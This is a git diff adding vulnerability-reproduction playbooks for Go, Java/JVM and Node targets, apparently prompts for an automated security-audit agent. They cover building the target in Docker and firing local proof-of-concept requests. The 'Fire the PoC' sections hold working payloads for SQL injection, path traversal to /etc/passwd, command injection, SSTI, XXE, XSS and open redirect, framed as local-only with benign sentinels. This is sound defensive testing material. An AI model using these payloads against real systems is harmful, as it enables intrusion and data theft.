+# SQL injection — observe error or extracted marker (Go's database/sql with
+# string-concatenated queries is the classic sink):
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/user?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — http.ServeFile / os.Open on a
+# user-controlled path; pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# URL-encoded traversal that bypasses naive filepath.Clean-after-join:
+curl -s "http://127.0.0.1:$PORT/static/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary in a sidecar on $CN's network, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# Also test cloud-metadata SSRF guards WITHOUT leaving the box — the request
+# must stay local; 169.254.169.254 is only a payload string, not a real target.
+
+# Command injection / RCE — os/exec with user input. Prove exec via a benign
+# in-container sentinel, then read it back (NEVER destructive commands).
+# Needs a shell in the runtime image (use debian:12-slim, not distroless):
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSTI (html/template misused as text/template, or user-controlled template
+# text) — submit a template expression and observe it evaluated:
+curl -s "http://127.0.0.1:$PORT/render?tpl=%7B%7B.Secret%7D%7D" | tee -a /tmp/poc.$FID.out
+
+# Reflected/stored XSS — text/template or manual string-building bypasses Go's
+# default html/template escaping; confirm the payload is reflected unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — http.Redirect with a user-controlled Location:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# gRPC sink — invoke the method with grpcurl against the local container:
+docker run --rm --network "container:$CN" fullstorydev/grpcurl -plaintext \
+  -d '{"id":"1 OR 1=1"}' 127.0.0.1:50051 pkg.Service/Method
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated template, redirect header, 500 with stack)
+  → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; side effects are benign
+sentinels only.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library/CLI, or web boot blocked):** drive the
+   vulnerable function directly with a Go test in the SDK image — the
+   highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink (-run targets it):
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     go test -run 'TestVulnerable' ./path/to/pkg/...
+
+   # Or drop a one-off harness into the package and run it as a test.
+   # Use the module path from go.mod for the import:
+   cat > "$WT/path/to/pkg/poc_test.go" <<'EOF'
+   package pkg
+   import "testing"
+   func TestPoC(t *testing.T) {
+       out := Vulnerable("<payload>")        // call the vulnerable API
+       if !contains(out, "<impact-marker>") {
+           t.Fatalf("no impact: %q", out)
+       }
+       t.Logf("IMPACT: %s", out)
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     go test -run TestPoC -v ./path/to/pkg/...
+   ```
+
+   For an HTTP handler that won't boot standalone, exercise it in-process with
+   `net/http/httptest` (no real port, no network) — still `method: unit-test`:
+
+   ```go
+   req := httptest.NewRequest("GET", "/download?file=../../etc/passwd", nil)
+   rr := httptest.NewRecorder(); Handler(rr, req)
+   // assert rr.Body contains the leaked content
+   ```
+
+2. **Image builds but the app can't start (missing DB/config/env, cgo dep,
+   private module resolved but service deps absent):** record that
+   `go build` succeeds, `go mod verify` passes, and the vulnerable code is
+   present and reachable, with the line-referenced source→sink trace as
+   evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src golang:1.23-bookworm \
+     sh -c 'go build ./... && go vet ./... ; true'
+   ```
+
+3. **Cannot build at all (toolchain/network blocked, unresolvable private
+   deps):** construct a static PoC — the exact crafted input plus the
+   line-referenced source→sink path showing why it triggers. Set
+   `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/java-jvm.md b/plugins/security/prompts/playbooks/java-jvm.md
new file mode 100644
index 0000000..ae38648
--- /dev/null
+++ b/plugins/security/prompts/playbooks/java-jvm.md
@@ -0,0 +1,491 @@
+# ENV Playbook — Java / JVM
+
+Build, run, and exploit a Java / JVM target (Spring Boot / Spring MVC / Jakarta
+EE / Quarkus / Micronaut / Dropwizard / plain Maven or Gradle library, or a
+Kotlin/Scala/Groovy app) to reproduce a candidate finding with a real PoC.
+Docker-first; the native JDK / Maven / Gradle toolchain may be absent on the
+host. Keep ALL traffic inside the local container — no external hosts, no real
+credentials, no data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls pom.xml build.gradle build.gradle.kts settings.gradle settings.gradle.kts \
+   gradlew mvnw Dockerfile docker-compose.yml 2>/dev/null
+find . -maxdepth 4 \( -name '*.java' -o -name '*.kt' -o -name '*.scala' \
+   -o -name '*.groovy' \) -not -path '*/target/*' -not -path '*/build/*' | head
+```
+
+- **Build tool / manifest:**
+  - `pom.xml` → **Maven**. The `<build>` `<plugins>` and `<parent>` reveal the
+    framework (`spring-boot-starter-parent`, `quarkus-maven-plugin`). Modules are
+    declared in `<modules>`; a multi-module repo has a root `pom.xml` plus
+    per-module `pom.xml`.
+  - `build.gradle` (Groovy DSL) or `build.gradle.kts` (Kotlin DSL) → **Gradle**.
+    `settings.gradle[.kts]` lists sub-projects (`include 'a', 'b'`).
+- **Wrapper present?** `./mvnw` / `./gradlew` pin the exact build-tool version —
+  prefer them over a system `mvn`/`gradle` for reproducibility.
+- **JDK version** — match the image to it. Read it from the manifest:
+
+  ```sh
+  grep -iE 'java\.version|maven\.compiler|<release>|<source>|<target>' pom.xml 2>/dev/null
+  grep -iE 'sourceCompatibility|targetCompatibility|JavaLanguageVersion|languageVersion' \
+    build.gradle build.gradle.kts 2>/dev/null
+  cat .sdkmanrc .tool-versions 2>/dev/null
+  ```
+
+- **Framework tells** (dependencies in the manifest, or `@SpringBootApplication`
+  / annotations):
+  - Spring Boot → `spring-boot-starter*`; entry is a `@SpringBootApplication`
+    `main`, packaged as an executable fat-jar. Default port **8080**.
+  - Spring MVC (classic WAR) → `spring-webmvc` + a `web.xml` / `WEB-INF`;
+    deployed to Tomcat/Jetty. Produces a `*.war`.
+  - Quarkus → `quarkus-*`; runs `java -jar quarkus-app/quarkus-run.jar`, port
+    **8080**.
+  - Micronaut → `io.micronaut*`, port **8080**. Dropwizard → `io.dropwizard`,
+    app port **8080**, admin **8081**.
+  - Jakarta/Java EE → packaged `*.war`/`*.ear`, needs an app server
+    (Tomcat/WildFly/Payara). Heaviest to run live → consider Fallbacks.
+  - Library / SDK (no framework, no `main`, packaging `jar`) → nothing to serve;
+    go to Fallbacks and drive the sink from a JUnit test (`method: unit-test`).
+- **Entry point & packaging** — ground truth for how it runs:
+
+  ```sh
+  grep -rl '@SpringBootApplication\|public static void main' \
+    --include='*.java' --include='*.kt' src 2>/dev/null | head
+  grep -iE '<packaging>|spring-boot-maven-plugin|application\b|mainClass' \
+    pom.xml build.gradle build.gradle.kts 2>/dev/null
+  ```
+
+  `<packaging>jar</packaging>` (or default) + the Spring Boot / Shadow / Shadow
+  plugin → an executable fat-jar (`java -jar`). `<packaging>war</packaging>` →
+  needs a servlet container.
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Keep the build context lean and out of the host's reach — never copy stale build
+output (`target/`, `build/`) into the image; let the container build fresh. The
+`.dockerignore` keeps it out of the context:
+
+```sh
+printf '.git\ntarget\nbuild\n.gradle\n*.class\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+The JVM compile step is heavy and pulls many dependencies. Use BuildKit cache
+mounts (or a mounted local repo) so re-runs are fast, and prefer the wrapper to
+pin the build-tool version.
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up the build, the correct
+fat-jar / WAR, the JVM flags, env, and the DB for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the JDK tag from step 1 (fall back to a recent LTS, e.g. `eclipse-temurin`
+**21**; use **17** or **11** if the manifest targets an older release — a newer
+JDK can reject old source/bytecode). A multi-stage build compiles in a JDK image
+and runs the artifact on a smaller JRE.
+
+**Maven** (uses the wrapper if present, else the `maven` image):
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+# --- build stage ---
+FROM maven:3.9-eclipse-temurin-21 AS build
+WORKDIR /src
+# Copy manifests first for dependency-layer caching.
+COPY pom.xml ./
+COPY .mvn/ .mvn/ 2>/dev/null
+COPY mvnw* ./
+# Pre-fetch deps offline-friendly (cache mount keeps re-runs fast).
+RUN --mount=type=cache,target=/root/.m2 \
+    mvn -B -ntp -q dependency:go-offline || true
+COPY . .
+# Skip tests for the repro build (the audited code, not its test suite, matters).
+RUN --mount=type=cache,target=/root/.m2 \
+    mvn -B -ntp -DskipTests package
+# --- run stage ---
+FROM eclipse-temurin:21-jre
+WORKDIR /app
+# Spring Boot / Shadow fat-jar: grab the executable jar (excludes *-sources / *-plain).
+COPY --from=build /src/target/*.jar /app/app.jar
+EXPOSE 8080
+ENTRYPOINT ["java","-jar","/app/app.jar"]
+EOF
+
+DOCKER_BUILDKIT=1 docker build -f /tmp/Dockerfile.$FID \
+  --iidfile /tmp/va-$FID.iid -t $IMG "$WT"
+```
+
+**Gradle** (swap the build stage):
+
+```sh
+# FROM gradle:8-jdk21 AS build
+# WORKDIR /src
+# COPY . .
+# RUN --mount=type=cache,target=/home/gradle/.gradle \
+#     gradle --no-daemon clean bootJar -x test   # or: shadowJar / build -x test
+# # run stage:
+# COPY --from=build /src/build/libs/*.jar /app/app.jar   # pick the executable jar
+```
+
+Notes that bite on JVM builds:
+
+- A Spring Boot Maven build produces both `app.jar` (executable) and
+  `app-plain.jar` (no deps). Gradle's `jar` task likewise yields a thin jar;
+  the executable one is from `bootJar`/`shadowJar`. If the glob grabs the wrong
+  one, `java -jar` fails with `no main manifest attribute` — copy the specific
+  artifact instead.
+- **WAR projects** can't `java -jar`. Either build with Spring Boot's executable
+  WAR (still `java -jar`), or run a servlet container:
+  `FROM tomcat:10-jre21` and `COPY target/*.war /usr/local/tomcat/webapps/ROOT.war`.
+- **Spring Boot's own image build** is often easiest and reproducible:
+  `./mvnw spring-boot:build-image -Dspring-boot.build-image.imageName=$IMG`
+  (or `./gradlew bootBuildImage --imageName=$IMG`) — produces a runnable image
+  without writing a Dockerfile. Try this first if a fat-jar copy is fiddly.
+
+Start command, by how the project runs (the app must bind `0.0.0.0`, not
+`127.0.0.1`, or the mapped host port can't reach it — Spring binds all
+interfaces by default, but `server.address=127.0.0.1` in config overrides that):
+
+- **Spring Boot / Quarkus / Micronaut / Dropwizard fat-jar:** `java -jar
+  /app/app.jar` (the `ENTRYPOINT` above). Dropwizard needs the `server`
+  subcommand + config: `java -jar app.jar server config.yml`.
+- **WAR on a container:** the servlet container's own entrypoint serves it.
+- **Library / no `main`:** nothing to serve → Fallbacks, `method: unit-test`.
+
+---
+
+## 4. Dependencies
+
+Restore reproducibly from the manifest; both tools resolve transitive deps from
+the declared coordinates.
+
+```sh
+# Maven — pre-fetch everything the build needs, then build offline if desired:
+./mvnw -B -ntp dependency:go-offline      # or: mvn ...
+./mvnw -B -ntp -o -DskipTests package     # -o = offline, uses the local repo
+
+# Gradle — resolve dependencies, then build:
+./gradlew --no-daemon dependencies        # forces resolution of all configs
+./gradlew --no-daemon -x test build       # --offline once the cache is warm
+```
+
+- Honor the declared versions exactly; do **not** bump or add deps — that
+  changes the audited dependency set. (Maven `versions:use-latest-releases`,
+  Gradle `--refresh-dependencies` to *upgrade* — avoid both.)
+- **Lockfiles** (when present): Gradle `gradle.lockfile` / `gradle/*.lockfile`
+  pin exact versions — keep `--write-locks` OFF so resolution stays as audited.
+  Maven has no native lockfile; the declared versions (+ any `dependencyManagement`
+  / BOM) are authoritative.
+- **Private/internal repos:** a `<repositories>`/`<server>` in `settings.xml` or
+  a Gradle `maven { url ... }` may need auth. Out of scope — do not supply real
+  credentials. If a dep can't resolve, note it and fall back.
+- **JDK mismatch** is the usual build failure: a build targeting Java 21 features
+  fails under JDK 17 (and vice-versa, old bytecode under a new JDK can warn or
+  fail). Re-read step 1 and pick the matching `eclipse-temurin` tag.
+- The BuildKit `--mount=type=cache` for `~/.m2` / `~/.gradle` makes re-builds
+  fast; alternatively bind-mount a host cache:
+  `-v "$HOME/.m2":/root/.m2` (read-only is safest: `:ro`).
+
+---
+
+## 5. Run & health-check
+
+Pick a free ephemeral host port keyed to the finding, then run detached with a
+unique name:
+
+```sh
+PORT=$(python3 -c 'import socket;s=socket.socket();s.bind(("",0));print(s.getsockname()[1]);s.close()')
+
+docker run -d --name $CN -p 127.0.0.1:$PORT:8080 \
+  -e SERVER_PORT=8080 -e SERVER_ADDRESS=0.0.0.0 \
+  $IMG
+```
+
+Bind the host port to `127.0.0.1` so the app is never exposed off-box. Map the
+container port (`:8080`) to whatever the code actually listens on — read it from
+`application.properties` / `application.yml` (`server.port`), env, or the
+framework default (Spring Boot / Quarkus / Micronaut / Dropwizard app **8080**;
+Dropwizard admin **8081**; a Tomcat container **8080**). Spring honors
+`SERVER_PORT` / `SERVER_ADDRESS` env (relaxed binding) — pass them if the config
+hardcodes a loopback bind.
+
+**If the app binds `127.0.0.1` inside the container** (e.g. `server.address`
+config), a `-p` map can't reach it (loopback is per-namespace). Either fire the
+PoC from inside the container (`docker exec $CN ...`; the temurin JRE image has a
+shell), or run with `--network host` on Linux so the container's loopback is the
+host's:
+
+```sh
+docker run -d --name $CN --network host $IMG    # then target 127.0.0.1:<code-port>
+```
+
+Confirm it is up — JVM apps boot slowly (cold JIT, Spring context); poll
+generously, don't sleep blindly:
+
+```sh
+for i in $(seq 1 60); do
+  curl -fsS -o /dev/null "http://127.0.0.1:$PORT/" && { echo up; break; }
+  # Spring Boot Actuator (if on the classpath) gives a clean readiness signal:
+  curl -fsS "http://127.0.0.1:$PORT/actuator/health" 2>/dev/null | grep -q UP && { echo up; break; }
+  sleep 2
+done
+docker logs --tail 80 $CN          # inspect boot errors if curl never succeeds
+```
+
+A 404 / 401 / 403 on `/` still means the server is up — any HTTP response counts
+as healthy. Look for the framework boot line in the logs (Spring's `Started
+<App> in N seconds` / `Tomcat started on port(s): 8080`, Quarkus's `Listening on:
+http://0.0.0.0:8080`, Micronaut's `Startup completed`). A boot that hangs is
+usually a missing DB/broker dependency — see Seed, or fall back.
+
+---
+
+## 6. Seed
+
+Only seed what the PoC needs; keep it minimal and synthetic.
+
+- **DB-backed app:** Spring Boot with an embedded H2 (`spring.datasource.url=
+  jdbc:h2:mem:...`) or `spring.jpa.hibernate.ddl-auto=create`/`update` creates
+  the schema on boot — nothing to seed. For Flyway/Liquibase, migrations run
+  automatically at startup. If it points at an external Postgres/MySQL, start a
+  sidecar on the container's network and point the app at it (synthetic creds
+  only):
+
+  ```sh
+  docker run -d --name va-db-$FID --network "container:$CN" \
+    -e POSTGRES_PASSWORD=poc -e POSTGRES_DB=app postgres:16-alpine
+  # then run with: -e SPRING_DATASOURCE_URL=jdbc:postgresql://127.0.0.1:5432/app \
+  #                -e SPRING_DATASOURCE_USERNAME=postgres -e SPRING_DATASOURCE_PASSWORD=poc
+  ```
+
+  An app-shipped seed import (`data.sql`, `import.sql`, a CommandLineRunner) runs
+  on boot — let it.
+
+- **Auth flow:** if the PoC needs a session/token, register or log in via the
+  app's own endpoint with synthetic creds and keep the cookie jar / capture the
+  token:
+
+  ```sh
+  # Spring Security form login (cookie session):
+  curl -s -c /tmp/jar.$FID -b /tmp/jar.$FID \
+    -d 'username=poc&password=Poc-Passw0rd!' \
+    "http://127.0.0.1:$PORT/login"
+
+  # JSON login → JWT/bearer; capture the token for the Authorization header:
+  TOKEN=$(curl -s -H 'Content-Type: application/json' \
+    -d '{"username":"poc","password":"Poc-Passw0rd!"}' \
+    "http://127.0.0.1:$PORT/api/auth/login" \
+    | python3 -c 'import sys,json;d=json.load(sys.stdin);print(d.get("token") or d.get("access_token") or d.get("accessToken",""))')
+  ```
+
+  Spring Boot dev sometimes prints a generated default password to the log
+  (`Using generated security password: ...`) — read it from `docker logs $CN`
+  for a `user` login when no registration endpoint exists.
+
+- Use only fake, local-only credentials. Never reuse real secrets from the repo
+  beyond what is strictly required to boot.
+
+---
+
+## 7. Fire the PoC safely
+
+Send the exploit to the **local** container only and capture concrete evidence.
+Tailor to the finding's source→sink path; examples per class (several map to the
+JVM-classic vuln families):
+
+```sh
+# SQL injection — string-concatenated JDBC / a misused JPA query; observe error
+# or extracted marker:
+curl -s -b /tmp/jar.$FID "http://127.0.0.1:$PORT/users?id=1%20OR%201=1--" | tee /tmp/poc.$FID.out
+
+# Path traversal / arbitrary file read — Files.newInputStream / new File(userPath),
+# or a ResourceHandler; pull a file the app should never serve:
+curl -s "http://127.0.0.1:$PORT/download?file=../../../../etc/passwd" | head
+# Encoded traversal that bypasses naive normalize-after-concat:
+curl -s "http://127.0.0.1:$PORT/files/..%2f..%2f..%2fetc%2fpasswd" | head
+
+# Insecure deserialization — the JVM signature class. Java native
+# (ObjectInputStream), Jackson polymorphic typing, SnakeYAML, XStream, etc.
+# Prove via a BENIGN in-container sentinel gadget — never a destructive payload.
+# e.g. trigger a class-load / process touch you can read back:
+curl -s -X POST -H 'Content-Type: application/json' \
+  --data-binary @/tmp/poc-gadget.$FID.json "http://127.0.0.1:$PORT/api/import"
+docker exec $CN ls -l /tmp/va-pwned 2>&1   # benign marker the gadget created
+
+# SSTI — Thymeleaf/Freemarker/Velocity/SpEL with user-controlled template text.
+# Submit an expression and observe it evaluated server-side:
+# SpEL: ${T(java.lang.Runtime).getRuntime()...}  Thymeleaf: __${...}__::.x
+curl -s "http://127.0.0.1:$PORT/render?name=%24%7B7*7%7D" | grep -o '49'
+
+# XXE — XML parser without FEATURE_SECURE_PROCESSING / external-entity disabled.
+# Use a LOCAL file or a container-local listener, never a remote URL:
+curl -s -X POST -H 'Content-Type: application/xml' --data-binary @- \
+  "http://127.0.0.1:$PORT/api/xml" <<'XML' | head
+<?xml version="1.0"?>
+<!DOCTYPE r [ <!ENTITY x SYSTEM "file:///etc/hostname"> ]>
+<r>&x;</r>
+XML
+
+# OS command injection — Runtime.exec / ProcessBuilder with user input. Benign
+# in-container sentinel, then read it back:
+curl -s "http://127.0.0.1:$PORT/ping?host=127.0.0.1;touch%20/tmp/va-pwned"
+docker exec $CN ls -l /tmp/va-pwned 2>&1
+
+# SSRF — point at a CONTAINER-LOCAL listener you control, never a real host.
+# Start a canary sharing $CN's network namespace, then make the app fetch it:
+docker run -d --name va-canary-$FID --network "container:$CN" \
+  python:3-slim python3 -c 'import http.server,socketserver;socketserver.TCPServer(("127.0.0.1",9999),type("H",(http.server.BaseHTTPRequestHandler,),{"do_GET":lambda s:(s.send_response(200),s.end_headers(),s.wfile.write(b"CANARY"))})).serve_forever()'
+curl -s "http://127.0.0.1:$PORT/fetch?url=http://127.0.0.1:9999/" | grep -o CANARY
+# 169.254.169.254 (cloud metadata) is only a payload STRING here — the request
+# must stay local; never actually reach an external/metadata endpoint.
+
+# Reflected/stored XSS — a template/response that emits user input unescaped:
+curl -s "http://127.0.0.1:$PORT/profile?name=%3Cscript%3Ealert(1)%3C/script%3E" \
+  | grep -o '<script>alert(1)</script>'
+
+# Open redirect — sendRedirect / RedirectView with a user-controlled target:
+curl -s -o /dev/null -D- "http://127.0.0.1:$PORT/redirect?next=https://evil.example" \
+  | grep -i '^location:'   # evidence is the header value, no external request made
+
+# Actuator exposure (Spring Boot misconfig) — sensitive endpoints reachable:
+curl -s "http://127.0.0.1:$PORT/actuator/env" | head
+curl -s "http://127.0.0.1:$PORT/actuator/heapdump" -o /tmp/poc.$FID.hprof && ls -l /tmp/poc.$FID.hprof
+```
+
+Evidence to record for the repro result:
+
+- The exact request (method, path, headers, body) → `poc`.
+- The response/log line proving impact (leaked row, file contents, sentinel
+  file, reflected script, evaluated expression `49`, XXE-leaked file, redirect
+  header, exposed actuator data, 500 with a Java stack trace) → `observed`.
+- What it means for the target → `impact`. Set `reproduced: true`,
+  `method: live-exploit`.
+
+Safety invariants: traffic stays on `127.0.0.1` / inside `$CN`'s network; no
+outbound connections to real hosts; no real data; deserialization / command /
+SSRF payloads create only benign in-container sentinels, never destructive or
+exfiltrating ones.
+
+---
+
+## 8. Teardown
+
+Always clean up, even on failure (idempotent):
+
+```sh
+docker rm -f $CN va-canary-$FID va-db-$FID 2>/dev/null
+docker compose -p va-$FID down -v 2>/dev/null
+docker image rm -f $IMG 2>/dev/null
+rm -f /tmp/jar.$FID /tmp/poc.$FID.out /tmp/poc.$FID.hprof \
+      /tmp/poc-gadget.$FID.json /tmp/Dockerfile.$FID \
+      /tmp/va-$FID.dockerignore /tmp/va-$FID.iid
+
+cd /                                   # leave the worktree before removing it
+git -C <target> worktree remove --force /tmp/va-$FID
+git -C <target> worktree prune
+```
+
+---
+
+## 9. Fallbacks
+
+If a live exploit is not achievable, downgrade deliberately and set `method`
+accordingly (enum: `live-exploit | unit-test | build-only | static-poc`).
+
+1. **Won't serve but builds (library, WAR needing a full app server, or web boot
+   blocked):** drive the vulnerable method directly with a JUnit test in the
+   build image — the highest-fidelity non-server proof. Set `method: unit-test`.
+
+   ```sh
+   # Run the project's own focused test if one covers the sink:
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -Dtest=VulnerableTest test
+   # Gradle:
+   docker run --rm -v "$WT":/src -w /src gradle:8-jdk21 \
+     gradle --no-daemon test --tests '*Vulnerable*'
+
+   # Or drop a one-off harness test that calls the vulnerable API and asserts impact.
+   # Place it under src/test/java/<pkg> matching the target's package:
+   cat > "$WT/src/test/java/com/example/PoCTest.java" <<'EOF'
+   package com.example;
+   import org.junit.jupiter.api.Test;
+   import static org.junit.jupiter.api.Assertions.*;
+   class PoCTest {
+       @Test void poc() throws Exception {
+           String out = new Vulnerable().handle("<payload>");   // call the sink
+           assertTrue(out.contains("<impact-marker>"), "no impact: " + out);
+           System.out.println("IMPACT: " + out);
+       }
+   }
+   EOF
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -Dtest=PoCTest test
+   ```
+
+   For a Spring controller that won't boot the full context, exercise it with
+   `MockMvc` / `@WebMvcTest` (slice test — no real port, no network), or stand up
+   the app in-process with `SpringBootTest(webEnvironment=RANDOM_PORT)` +
+   `TestRestTemplate`. Still `method: unit-test`.
+
+2. **Image builds but the app can't start (missing DB/broker/config, app-server
+   dependency, private repo resolved but service deps absent):** record that the
+   build succeeds (`package` produced the artifact), the dependency set resolves,
+   and the vulnerable code is present and reachable, with the line-referenced
+   source→sink trace as evidence. Set `method: build-only`.
+
+   ```sh
+   docker run --rm -v "$WT":/src -w /src maven:3.9-eclipse-temurin-21 \
+     mvn -B -ntp -DskipTests package    # or: gradle --no-daemon assemble -x test
+   ```
+
+3. **Cannot build at all (toolchain/network blocked, unresolvable private deps,
+   JDK mismatch that can't be reconciled):** construct a static PoC — the exact
+   crafted input plus the line-referenced source→sink path showing why it
+   triggers. Set `method: static-poc`, `reproduced: false`.
+
+Prefer the highest-fidelity rung that actually works; never claim
+`reproduced: true` without observed runtime evidence.
diff --git a/plugins/security/prompts/playbooks/node.md b/plugins/security/prompts/playbooks/node.md
new file mode 100644
index 0000000..aa8f450
--- /dev/null
+++ b/plugins/security/prompts/playbooks/node.md
@@ -0,0 +1,339 @@
+# ENV Playbook — Node / TypeScript
+
+Build, run, and exploit a Node / TypeScript target (Express / Next / Nest /
+Fastify / Koa / plain package) to reproduce a candidate finding with a real PoC.
+Docker-first; the native Node / TS toolchain may be absent on the host. Keep ALL
+traffic inside the local container — no external hosts, no real credentials, no
+data exfiltration.
+
+Conventions used below (substitute per finding):
+
+- `FID` — the finding id (e.g. `f3`); use it to make names/ports unique so
+  parallel repros never collide.
+- `WT=/tmp/va-$FID` — isolated git worktree path.
+- `IMG=va-$FID:repro` — image tag. `CN=va-$FID` — container name.
+- `PORT` — an ephemeral host port (pick a free one, see Run & health-check).
+- The final repro result must set `method` to one of:
+  `live-exploit | unit-test | build-only | static-poc`.
+
+---
+
+## 1. Detect
+
+Confirm the stack from the target tree (read-only):
+
+```sh
+ls package.json package-lock.json pnpm-lock.yaml yarn.lock tsconfig.json 2>/dev/null
+find . -maxdepth 3 \( -name '*.ts' -o -name '*.tsx' -o -name '*.js' -o -name '*.mjs' \) \
+  -not -path '*/node_modules/*' | head
+```
+
+- **Manifests:** `package.json` (always). Lockfile picks the package manager:
+  `package-lock.json` → npm, `pnpm-lock.yaml` → pnpm, `yarn.lock` → yarn.
+- **TypeScript:** `tsconfig.json` and `*.ts`/`*.tsx`. Compiled via `tsc`,
+  `ts-node`/`tsx` (run TS directly), or a bundler (esbuild/swc/webpack/vite).
+- **Framework tells** (`dependencies` in `package.json`, or imports):
+  - Express → `express`; entry often `app.js`/`server.js`/`src/index.ts`.
+  - Fastify → `fastify`. Koa → `koa`. Hapi → `@hapi/hapi`.
+  - NestJS → `@nestjs/core`; entry `main.ts`, bootstraps on `3000`.
+  - Next.js → `next` + a `next.config.*`; `pages/` or `app/` dir.
+  - Library (no server) → no framework dep, has a `main`/`exports`/`bin` field.
+- **Entry & scripts:** read `package.json` `scripts` (`start`, `dev`, `build`)
+  and `main`/`module`/`exports`/`bin`. The `start`/`build` scripts are the
+  ground truth for how the project runs.
+- **Node version:** `.nvmrc`, `.tool-versions`, or `engines.node` in
+  `package.json`. Match the image tag to it.
+
+```sh
+cat .nvmrc 2>/dev/null
+node -e 'p=require("./package.json");console.log(JSON.stringify({scripts:p.scripts,main:p.main,bin:p.bin,engines:p.engines},null,2))' 2>/dev/null \
+  || grep -E '"(scripts|main|bin|engines|start|build|dev)"' package.json
+```
+
+---
+
+## 2. Isolate
+
+Work in a throwaway git worktree at the target ref so the original tree is
+never touched. From inside the target repo:
+
+```sh
+REF=<commit-or-branch>            # the ref under audit; default HEAD
+git -C <target> worktree add --detach /tmp/va-$FID "$REF"
+cd /tmp/va-$FID
+```
+
+If `<target>` is not a git repo (rare), `cp -a <target> /tmp/va-$FID` instead
+and note it. All build/run steps below run from `WT=/tmp/va-$FID`.
+
+Never copy a host `node_modules` into the build — it may carry host-native
+binaries and stale state. Let the container install fresh (the Dockerfiles below
+do this; the `.dockerignore` keeps it out of the build context):
+
+```sh
+printf 'node_modules\nnpm-debug.log\n.git\n' > /tmp/va-$FID.dockerignore
+```
+
+---
+
+## 3. Build & run (docker-first)
+
+### 3a. If the repo ships its own Docker
+
+Prefer the project's own definition — it usually wires up DB, env, build, and
+the correct start command for you.
+
+```sh
+# Compose (opportunistic — the plugin may be missing):
+docker compose version >/dev/null 2>&1 && \
+  docker compose -p va-$FID up -d --build
+
+# Otherwise plain docker with the repo Dockerfile (the reliable path):
+docker build -t $IMG .
+```
+
+### 3b. No Dockerfile — minimal generic image
+
+Pick the Node tag from step 1 (fall back to a recent LTS, e.g. `node:22-slim`).
+The image installs deps with the detected package manager, builds if a `build`
+script exists, and defers the start command to run time.
+
+```sh
+cat > /tmp/Dockerfile.$FID <<'EOF'
+FROM node:22-slim
